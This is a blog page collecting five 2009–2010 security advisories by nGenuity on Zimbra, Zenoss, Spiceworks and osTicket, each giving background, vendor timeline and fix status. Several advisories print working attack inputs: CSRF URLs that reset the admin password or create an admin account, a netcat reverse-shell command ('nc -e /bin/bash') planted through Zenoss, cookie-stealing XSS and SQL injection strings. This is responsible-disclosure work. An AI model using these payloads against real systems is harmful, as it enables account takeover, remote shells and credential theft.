Posts tagged: advisory

Mar 08 2010

Zimbra search skin XSS

nGenuity Information Services – Security Advisory

   Advisory ID: NGENUITY-2010-004 - Zimbra search skin XSS
   Application: Zimbra
        Vendor: Zimbra
Vendor website: http://www.spiceworks.com
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
         Class: XSS
Authentication: Valid session required

  I. BACKGROUND
     Zimbra [1] is an open-source and commercial messaging and collaboration software
     suite.

 II. DETAILS
     A cross-site script (XSS) vulnerability exists within the classic Zimbra web
     interface. This vulnerability exists due to improper output encoding of the
     skin parameter.

     Example:
     http://example.com/zimbra/h/search?skin=--><script src=""></script><!--&
     mesg=welcome&initial=true&app=

     The vendor states that this vulnerability is addressed in version 5.0.20 and
     6.0.2. "The 5.0.x series of releases was not vulnerable to this issue.  We
     applied the same change in 5.0.20 that went into 6.0.2, but that was just for
     safety.  In 5.0.x other code prohibited this exploit."
III. REFERENCES
     [1] - http://www.zimbra.com

 IV. VENDOR COMMUNICATION
     10.07.2009 - Vulnerability Discovery & Vendor Notification.
     10.08.2009 - Vendor bug filed.
     12.15.2009 - Follow-up to find out fix status.
     12.15.2009 - Vendor Statement that this has been addressed.

The contents of this advisory are copyright (c) nGenuity Information  Security
and may be distributed freely provided that no fee is charged  for this distribution
and proper credit is given.

Tags: , , , , ,

Filed in Advisories, Web Application Security | Adam Baldwin | Comments (0)

Jan 14 2010

NGENUITY-2010-002 Zenoss Multiple Admin CSRF

nGenuity Information Services - Security Advisory
   Advisory ID: NGENUITY-2010-002 - Zenoss Multiple Admin CSRF
   Application: Zenoss 2.3.3
        Vendor: Zenoss
Vendor website: http://www.zenoss.com
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)

  I. BACKGROUND
     Zenoss is a commercial and open source systems and network monitoring tool. Much
     of the applications functionality is accessible via a front end web application.

 II. DETAILS

     Multiple CSRF vulnerabilities exist that can allow for arbitrary
     commands to be executed on the Zenoss server as well as reset the Zenoss
     admin password.

     Attack scenario: If an administrator has an active Zenoss
     session and visits one of these links or visits a malicious page that
     contains resources to point to these URL's

     1. Reset user password to a known state Cross-Site Request Forgery CSRF,
     in this case the password is reset to letmein.

http://172.16.28.5:8080/zport/dmd/ZenUsers/admin?defaultAdminLevel:int=1&

        defaultAdminRole=ZenUser&defaultPageSize:int=40&email=&eventConsoleRefresh:
        boolean=True&manage_editUserSettings:method=Save&netMapStartObject=&pager=&
        password=letmein&sndpassword=letmein&zenScreenName=editUserSettings

     2. Change and execute a command CSRF.
     Change the ping command to be a netcat shell out to a remote system. In
     this case an internal system running on port 443

        http://172.16.28.5:8080/zport/dmd/userCommands/ping?command:text=nc -e
        /bin/bash 172.16.28.6 443&commandId=ping&description:text=&
        manage_editUserCommand:method=Save&zenScreenName=userCommandDetail

     Execute the new "ping" command:

http://172.16.28.5:8080/zport/dmd/Devices/devices/localhost/manage_doUserCommand?commandId=ping


III. REFERENCES
     [1] - http://www.zenoss.com

 IV. VENDOR COMMUNICATION
     3.10.2009 - Vulnerability Discovery
     8.21.2009 - Requested status from vendor
     9.29.2009 - Vendor call (Fix pending)

Copyright (c) 2009 nGenuity Information Services, LLC

Tags: , ,

Filed in Advisories, Web Application Security | Adam Baldwin | Comments (1)

Jan 14 2010

NGENUITY-2010-001 Zenoss getJSONEventsInfo SQL Injection

nGenuity Information Services – Security Advisory

   Advisory ID: NGENUITY-2010-001 - Zenoss getJSONEventsInfo SQL Injection
   Application: Zenoss 2.3.3
        Vendor: Zenoss
Vendor website: http://www.zenoss.com
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
           BID: 37802

  I. BACKGROUND
     "Zenoss Core is an award-winning open source IT monitoring product that
     effectively manages the configuration, health and performance of
     networks, servers and applications through a single, integrated
     software package." [1] 

II. DETAILS
    getJSONEventsInfo contains multiple SQL Injection vulnerabilities due to improperly
    sanitized user provided input. The following URL parameters are injectable: severity,
    state, filter, offset, and count.

    Authentication as an admin or regular user is required for successful exploitation.
    Depending on the type of attack, it may also be accomplished via Cross-Site Request
    Forgery (CSRF).

    A proof of concept request might look like this
      /zport/dmd/Events/getJSONEventsInfo?severity=1&state=1&filter=&
      offset=0&count=60 into outfile "/tmp/z"
III. REFERENCES
     [1] - http://www.zenoss.com

 IV. VENDOR COMMUNICATION
     3.10.2009 - Vulnerability Discovery
     8.21.2009 - Requested status from vendor
     9.29.2009 - Vendor call (Fix pending)

     Update 1.21.2010
     This vulnerability was fixed prior to version 2.5.

http://dev.zenoss.org/trac/changeset/15257

Copyright (c) 2009 nGenuity Information Services, LLC

Tags: , , ,

Filed in Advisories, Web Application Security | Adam Baldwin | Comments (2)

Aug 08 2009

[NGENUITY] – Spiceworks Multiple Vulnerabilities (XSS & CSRF)

nGenuity Information Services – Security Advisory

   Advisory ID: NGENUITY-2009-009 - Spiceworks Multiple Vulnerabilities (XSS & CSRF)
   Application: Spiceworks 3.6.31847
        Vendor: Spiceworks
Vendor website: http://www.spiceworks.com
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
         Class: XSS, CSRF

  I. BACKGROUND
     Spiceworks is a network management, monitoring, helpdesk, etc application that
     uses a web based front end.

 II. DETAILS
     Multiple vulnerabilities exist within the Spiceworks platform that can be used
     to take over or otherwise abuse the application / infrastructure.

     These vulnerabilities allow for the following attack scenarios to be executed.

     1. Creation of a new Administrator account
     2. Password reset of users

     Exploit Examples:
     Create Administrator Account:

http://example.com/settings/users/create?user%5Bfirst_name%5D=Joe&user%5Bla

st_name%5D=Nobody&user%5Bemail%5D=user%40example.com&user%5Brole%5D=admin&us
er%5Bpassword%5D=PASSWORD&user%5Bpassword_confirmation%5D=PASSWORD

     User Password Reset:

http://example.com/settings/users/change_password/1?user%5Bpassword%5D=PASSWORD

&editorId=password_entry_for_1

     Edit: 8/10/2009
     Thank you to Melinda Rosario for pointing out that I forgot to include any details on the XSS
     portion of this advisory. It is a simple reflected XSS in the search parameter.

     Example:

http://example.com/search?query=--%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

     Edit: 8/11/2009
     Per Francis Sullivan at Spiceworks: Update to the latest Spiceworks 4.1 where the security issues
     are addresses.
III. REFERENCES
     [1] - http://www.spiceworks.com
     [2] - http://cwe.mitre.org/data/definitions/79.html
     [3] - http://cwe.mitre.org/data/definitions/352.html

 IV. VENDOR COMMUNICATION
     4.1.2009 - Vulnerability Discovery & Vendor Notification
     4.6.2009 - Second attempt to contact vendor
     4.7.2009 - Initial vendor response
     8.8.2009 - Advisory Release

Copyright (c) 2009 nGenuity Information Services, LLC

Tags: , , , , , ,

Filed in Advisories, Web Application Security | Adam Baldwin | Comments Off

Jun 26 2009

osTicket Admin Login Blind SQL Injection

nGenuity Information Services – Security Advisory

   Advisory ID: NGENUITY-2009-007 osTicket Admin Login Blind SQL Injection
   Application: osTicket v1.6 RC4
        Vendor: osTicket
Vendor website: http://www.osticket.com
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)

  I. BACKGROUND
    "osTicket is a widely-used open source support ticket system. It seamlessly
    integrates inquiries created via email and web-based forms into a simple
    easy to use multi-user web interface. Easily manage, organize and archive
    all your support requests and responses in one place while providing your
    clients with accountability and responsiveness they deserve." [1]

  II. DETAILS
    osTicket prior to v1.6 RC5 fails to validate / escape staff usernames which
    can be abused to execute a blind sql injection attack by an unauthenticated
    attacker.

    The vendor has provided a new release v1.6 RC5 which addresses this vulnerability.
    They have also provided patching instructions [2] should you be unable to perform
    a full upgrade at this time.

    One sample attack string might look similar to the following:
    '+(SELECT IF(SUBSTRING(passwd,1,1)=CHAR(48),BENCHMARK(1000000,SHA1(1)),0) passwd
    FROM ost_staff where staff_id=1) and '1'='1
  III. REFERENCES
    [1] - http://www.osticket.com
    [2] - http://osticket.com/forums/project.php?issueid=118

  IV. VENDOR COMMUNICATION
    3.25.2009 - Vulnerability Discovery
    3.25.2009 - Vendor notification & initial vendor response
    6.26.2009 - Vendor releases fix in osTicket v1.6 RC5 

Copyright (c) 2009 nGenuity Information Services, LLC

Tags: , , ,

Filed in Advisories, Web Application Security | Adam Baldwin | Comments Off

WordPress Themes